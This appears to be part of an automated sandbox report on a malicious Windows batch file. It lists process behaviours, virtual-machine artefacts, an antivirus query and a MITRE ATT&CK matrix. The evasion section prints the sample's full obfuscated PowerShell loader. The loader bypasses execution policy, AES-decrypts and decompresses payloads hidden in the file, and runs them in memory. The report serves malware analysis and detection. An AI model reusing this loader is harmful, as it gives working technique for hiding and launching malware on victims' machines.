      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3727Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6149Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep count: 3727 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748Thread sleep count: 6149 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep time: -4611686018427385s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: Amcache.hve.5.drBinary or memory string: VMware
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: wermgr.exe, 0000000C.00000003.3411164515.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3412288571.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
      Source: wermgr.exe, 0000000C.00000002.3412180204.000001F6CE7CB000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000003.3411164515.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmp, wermgr.exe, 0000000C.00000002.3412288571.000001F6CE84B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Yara detected Powershell decode and execute
      Source: Yara matchFile source: amsi64_5536.amsi.csv, type: OTHER
      Source: Yara matchFile source: \Device\ConDrv, type: DROPPED
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c "set __=^&rem"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pPLpJHM4GQSp820ezozLInZkcLGjwzAfhFyAUo/d1yU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kFkMa+H0Xjazq+yg0jtHMw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $liFcl=New-Object System.IO.MemoryStream(,$param_var); $YKPPP=New-Object System.IO.MemoryStream; $DrFOQ=New-Object System.IO.Compression.GZipStream($liFcl, [IO.Compression.CompressionMode]::Decompress); $DrFOQ.CopyTo($YKPPP); $DrFOQ.Dispose(); $liFcl.Dispose(); $YKPPP.Dispose(); $YKPPP.ToArray();}function execute_function($param_var,$param2_var){ $aGqbX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rErds=$aGqbX.EntryPoint; $rErds.Invoke($null, $param2_var);}$UsDBW = 'C:\Users\user\Desktop\info.cmd';$host.UI.RawUI.WindowTitle = $UsDBW;$rybfn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UsDBW).Split([Environment]::NewLine);foreach ($bSMhM in $rybfn) { if ($bSMhM.StartsWith('WUgLizIwoCqVFjuaxzXG')) { $FYrof=$bSMhM.Substring(20); break; }}$payloads_var=[string[]]$FYrof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypassJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('pplpjhm4gqsp820ezozlinzkclgjwzafhfyauo/d1yu='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('kfkma+h0xjazq+yg0jthmw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $lifcl=new-object system.io.memorystream(,$param_var); $ykppp=new-object system.io.memorystream; $drfoq=new-object system.io.compression.gzipstream($lifcl, [io.compression.compressionmode]::decompress); $drfoq.copyto($ykppp); $drfoq.dispose(); $lifcl.dispose(); $ykppp.dispose(); $ykppp.toarray();}function execute_function($param_var,$param2_var){ $agqbx=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rerds=$agqbx.entrypoint; $rerds.invoke($null, $param2_var);}$usdbw = 'c:\users\user\desktop\info.cmd';$host.ui.rawui.windowtitle = $usdbw;$rybfn=[system.io.file]::('txetlladaer'[-1..-11] -join '')($usdbw).split([environment]::newline);foreach ($bsmhm in $rybfn) { if ($bsmhm.startswith('wugliziwocqvfjuaxzxg')) { $fyrof=$bsmhm.substring(20); break; }}$payloads_var=[string[]]$fyrof.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('pplpjhm4gqsp820ezozlinzkclgjwzafhfyauo/d1yu='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('kfkma+h0xjazq+yg0jthmw=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $lifcl=new-object system.io.memorystream(,$param_var); $ykppp=new-object system.io.memorystream; $drfoq=new-object system.io.compression.gzipstream($lifcl, [io.compression.compressionmode]::decompress); $drfoq.copyto($ykppp); $drfoq.dispose(); $lifcl.dispose(); $ykppp.dispose(); $ykppp.toarray();}function execute_function($param_var,$param2_var){ $agqbx=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $rerds=$agqbx.entrypoint; $rerds.invoke($null, $param2_var);}$usdbw = 'c:\users\user\desktop\info.cmd';$host.ui.rawui.windowtitle = $usdbw;$rybfn=[system.io.file]::('txetlladaer'[-1..-11] -join '')($usdbw).split([environment]::newline);foreach ($bsmhm in $rybfn) { if ($bsmhm.startswith('wugliziwocqvfjuaxzxg')) { $fyrof=$bsmhm.substring(20); break; }}$payloads_var=[string[]]$fyrof.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0].replace('#', '/').replace('@', 'a'))));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1].replace('#', '/').replace('@', 'a'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		11
      Process Injection      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Standard Port      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts11
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)Logon Script (Windows)11
      Process Injection      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive11
      Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading      		LSA Secrets12
      System Information Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
